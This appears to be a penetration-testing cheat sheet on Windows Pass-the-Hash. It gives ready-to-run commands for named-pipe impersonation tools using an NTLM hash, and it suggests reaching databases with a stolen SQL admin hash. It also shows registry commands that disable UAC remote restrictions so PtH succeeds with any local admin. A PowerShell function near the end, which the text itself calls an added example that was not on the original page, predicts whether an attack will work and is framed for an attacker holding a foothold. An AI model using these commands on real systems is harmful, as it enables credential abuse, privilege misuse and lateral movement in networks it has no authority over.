Pass-the-Hash

NamedPipePTH

Impersonate a user via Pass-the-Hash for local actions only. The tool authenticates to a local named pipe with the user's NTLM hash and impersonates the pipe client, which yields an Impersonation token; network authentication from the spawned process does not work with an Impersonation token, only with a Delegation token:

PS > Invoke-ImpersonateUser-PTH -Username snovvcrash -Hash fc525c9683e8fe067095ba2ddc971889 -Target localhost -Domain . -PipeName mypipe -Binary C:\Windows\System32\cmd.exe -Verbose
PS > Invoke-SharpNamedPipePTH -C "username:snovvcrash domain:{megacorp.local|localhost} hash:fc525c9683e8fe067095ba2ddc971889 binary:C:\Windows\System32\cmd.exe"

Can be used, for example, to authenticate in SQL Server Management Studio (%PROGRAMFILES(X86)%\Microsoft SQL Server Management Studio 18\Common7\IDE\Ssms.exe) and access databases with the hash of a SQL admin account.

PtH Notes

User Account Control

LocalAccountTokenFilterPolicy & FilterAdministratorToken

By default only the built-in Administrator (RID 500) is exempt from UAC remote restrictions: other local admin accounts get a filtered token on network logons, so PtH with them fails. If LocalAccountTokenFilterPolicy exists and is set to 1 (the value doesn't exist by default, which behaves as 0), remote restrictions are disabled, network logons of all local admins get a full token and PtH will succeed:

PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name LocalAccountTokenFilterPolicy

If FilterAdministratorToken exists and is set to 1 (the value doesn't exist by default, which behaves as 0), the built-in local Administrator account (RID 500) also runs in Admin Approval Mode, its network logons get a filtered token and PtH with it will fail (unless LocalAccountTokenFilterPolicy is also set to 1, which overrides the filtering):

PS > Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\" -Name FilterAdministratorToken

Add (disables UAC remote restrictions, requires local admin rights on the target):

Cmd > reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
PS > New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -PropertyType "DWORD" -Value 1 -Force

Cleanup (restores the default):

Cmd > reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /f
PS > Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Force
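The three registry values above interact, and a missing value means the default (EnableLUA defaults to 1, the other two to 0). The following audit function is an added example, not part of the original page or of any tool mentioned on it; it reads the values from the local box and predicts, per account type, whether a local-admin PtH would succeed. The function name Get-PthUacState and the output field names are assumptions made here.

```powershell
# Added example (not from the original page): audit UAC remote-restriction settings
# and predict whether Pass-the-Hash with a local admin account will succeed.
# Assumes it runs on the target with rights to read HKLM. Decision logic follows the
# documented semantics of EnableLUA, LocalAccountTokenFilterPolicy (LATFP) and
# FilterAdministratorToken (FAT): a missing LATFP/FAT behaves as 0, missing EnableLUA as 1.
function Get-PthUacState {
    [CmdletBinding()]
    param()

    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    # Get-ItemProperty emits an error when the value is absent; absent means default.
    function Read-Dword([string]$Name, [int]$Default) {
        $v = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
        if ($null -eq $v) { return $Default }
        return [int]$v.$Name
    }

    $enableLua = Read-Dword 'EnableLUA' 1
    $latfp     = Read-Dword 'LocalAccountTokenFilterPolicy' 0
    $fat       = Read-Dword 'FilterAdministratorToken' 0

    # With UAC fully disabled no token filtering happens at all.
    $uacOff = ($enableLua -eq 0)

    [PSCustomObject]@{
        EnableLUA                     = $enableLua
        LocalAccountTokenFilterPolicy = $latfp
        FilterAdministratorToken      = $fat
        # RID 500 is filtered only when FAT=1 and LATFP does not override it.
        PthBuiltinAdminRid500         = $uacOff -or ($fat -ne 1) -or ($latfp -eq 1)
        # Any other local admin is filtered unless LATFP=1.
        PthOtherLocalAdmin            = $uacOff -or ($latfp -eq 1)
        # Domain accounts in the local Administrators group are not token-filtered on network logons.
        PthDomainAccountInLocalAdmins = $true
    }
}

Get-PthUacState | Format-List
```

Run it before spending a hash on a non-RID-500 local admin: a result of PthOtherLocalAdmin = False tells you the reg add from the previous step is needed first, which in turn requires a foothold that already has local admin rights on the box.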
